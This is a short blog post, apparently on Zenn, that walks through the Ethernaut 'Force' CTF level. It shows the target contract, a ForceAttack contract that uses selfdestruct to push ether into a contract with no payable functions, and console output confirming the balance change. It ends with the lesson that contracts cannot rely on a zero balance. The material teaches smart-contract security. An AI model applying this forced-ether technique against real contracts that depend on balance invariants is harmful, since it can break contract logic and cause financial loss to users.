Zenn
🌴

Ethernaut-solution 7. Force

2023/05/06に公開
Solidity
Ethereum
CTF
crypto
cybersecurity
tech

Ethernaut-solution

7. Force

Some contracts will simply not take your money ¯_(ツ)_/¯

The goal of this level is to make the balance of the contract greater than zero.

Things that might help:

  • Fallback methods

  • Sometimes the best way to attack a contract is with another contract.

  • See the Help page above, section "Beyond the console"

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Force {/*

                   MEOW ?
         /\_/\   /
    ____/ o o \
  /~____  =ø= /
 (______)__m_m)

*/}

//make AttackFile

/ForceAttack.sol

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

contract ForceAttack {
    constructor() public payable {

    }
 
    function attack(address payable _constractAddr) public {//errorが出たのでpayableはoriginal 
        selfdestruct(_constractAddr);
    }
}

ref: https://ethereum.stackexchange.com/questions/68059/invalid-implicit-conversion-from-address-to-address-payable-requested

await getBalance(contract.address)
'0'
contract.address
'0x58dc2d03B86410ed60cCdD453E568f3198EBAc7a'

//ether送金完了

await getBalance(contract.address)
'1'

In solidity, for a contract to be able to receive ether, the fallback function must be marked payable.

However, there is no way to stop an attacker from sending ether to a contract by self destroying.

Hence, it is important not to count on the invariant address(this).balance == 0 for any contract logic.

Discussion